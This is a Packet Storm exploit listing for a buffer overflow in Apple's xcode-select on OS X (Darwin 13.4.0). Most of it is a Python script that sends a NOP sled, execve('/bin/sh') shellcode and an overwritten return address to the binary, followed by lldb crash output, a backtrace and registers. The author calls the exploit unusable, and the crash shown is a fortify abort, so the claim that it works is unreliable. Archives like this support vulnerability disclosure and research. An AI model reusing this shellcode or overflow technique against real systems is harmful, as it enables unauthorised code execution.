xcode-select 13.4.0 Buffer Overflow

2014-09-23T00:00:00
ID PACKETSTORM:128349
Type packetstorm
Reporter Juan Sacco
Modified 2014-09-23T00:00:00

Description

                                        
                                            `# Exploit Title: xcode-select - buffer overflow  
# Description: xcode-select controls the location of the developer  
directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD  
development tools.  
# Date: Tuesday 23 2014  
# Exploit Author: Juan Sacco  
# Vendor Homepage: https://developer.apple.com  
# Software Link: https://developer.apple.com/xcode/  
# Version: 2333  
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0  
# CVE : None  
  
junk = "\x90"*5631  
shellcode =  
"\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80"  
#OSX/x86 intel - execve(/bin/sh) - 24 bytes  
  
buffer = "\x90\x90\x90\x90"*89  
eip = "\x7f\xff\x8e\x19\x98\x66"  
  
print "# xcode-select is prone to an overflow"  
print "# Wasting CPU clocks on unusable exploits"  
print "# This is exploit is for educational purposes"  
  
try:  
subprocess.call(["xcode-select", junk+shellcode+buffer+eip])  
except OSError as e:  
if e.errno == os.errno.ENOENT:  
print "xcode-select not found!"  
else:  
print "Error executing exploit"  
raise  
  
Process 5932 launched: '/usr/bin/xcode-select' (x86_64)  
Process 5932 stopped  
* thread #1: tid = 0x8358c, 0x00007fff8e199866  
libsystem_kernel.dylib`__pthread_kill + 10, queue =  
'com.apple.main-thread', stop reason = signal SIGABRT  
frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10  
libsystem_kernel.dylib`__pthread_kill + 10:  
-> 0x7fff8e199866: jae 0x7fff8e199870 ; __pthread_kill + 20  
0x7fff8e199868: movq %rax, %rdi  
0x7fff8e19986b: jmpq 0x7fff8e196175 ; cerror_nocancel  
0x7fff8e199870: ret  
(lldb)  
  
(lldb) bt  
* thread #1: tid = 0x8358c, 0x00007fff8e199866  
libsystem_kernel.dylib`__pthread_kill + 10, queue =  
'com.apple.main-thread', stop reason = signal SIGABRT  
* frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10  
frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92  
frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125  
frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181  
frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48  
frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16  
frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34  
frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157  
frame #8: 0x0000000100006315  
libxcselect.dylib`xcselect_find_developer_contents_from_path + 116  
frame #9: 0x0000000100000e75  
xcode-select`___lldb_unnamed_function3$$xcode-select + 57  
frame #10: 0x0000000100001562  
xcode-select`___lldb_unnamed_function5$$xcode-select + 1083a  
  
(lldb) register r -a  
General Purpose Registers:  
rax = 0x0000000000000000  
rbx = 0x00007fff769df310 libsystem_pthread.dylib`_thread  
rcx = 0x00007fff5fbfce18  
rdx = 0x0000000000000000  
rdi = 0x0000000000000d0b  
rsi = 0x0000000000000006  
rbp = 0x00007fff5fbfce40  
rsp = 0x00007fff5fbfce18  
r8 = 0x00000000fffffc00  
r9 = 0x00007fff5fbfce00  
r10 = 0x0000000008000000  
r11 = 0x0000000000000206  
r12 = 0x0000000000000400  
r13 = 0x000000000000000e  
r14 = 0x0000000000000006  
r15 = 0x00007fff5fbfd120  
rip = 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10  
rflags = 0x0000000000000206  
cs = 0x0000000000000007  
fs = 0x0000000000000000  
gs = 0x0000000000030000  
eax = 0x00000000  
ebx = 0x769df310  
ecx = 0x5fbfce18  
edx = 0x00000000  
edi = 0x00000d0b  
esi = 0x00000006  
ebp = 0x5fbfce40  
esp = 0x5fbfce18  
r8d = 0xfffffc00  
r9d = 0x5fbfce00  
r10d = 0x08000000  
r11d = 0x00000206  
r12d = 0x00000400  
r13d = 0x0000000e  
r14d = 0x00000006  
r15d = 0x5fbfd120  
`